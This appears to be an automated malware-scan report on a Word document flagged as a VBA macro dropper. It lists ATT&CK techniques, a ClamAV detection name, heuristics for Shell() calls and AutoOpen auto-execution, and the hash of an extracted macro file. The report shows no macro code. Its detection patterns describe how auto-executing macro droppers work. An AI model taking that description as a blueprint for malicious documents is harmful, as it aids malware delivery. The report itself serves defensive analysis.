Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious OLE document containing VBA macros. A critical heuristic firing indicates the use of the Shell() function within the VBA code, which is commonly used to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6595095-0' further supports its nature as a dropper. The VBA script appears to be obfuscated, but the presence of Shell() strongly suggests it's designed to download and execute a secondary payload.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6595095-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6595095-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10530 bytes |

SHA-256 (macros.bas): b97b03bfd303cb18fb93373d1be0d12a34a7420971d1f66f63a4373f00200666

Preview script: first 1,000 lines of the extracted script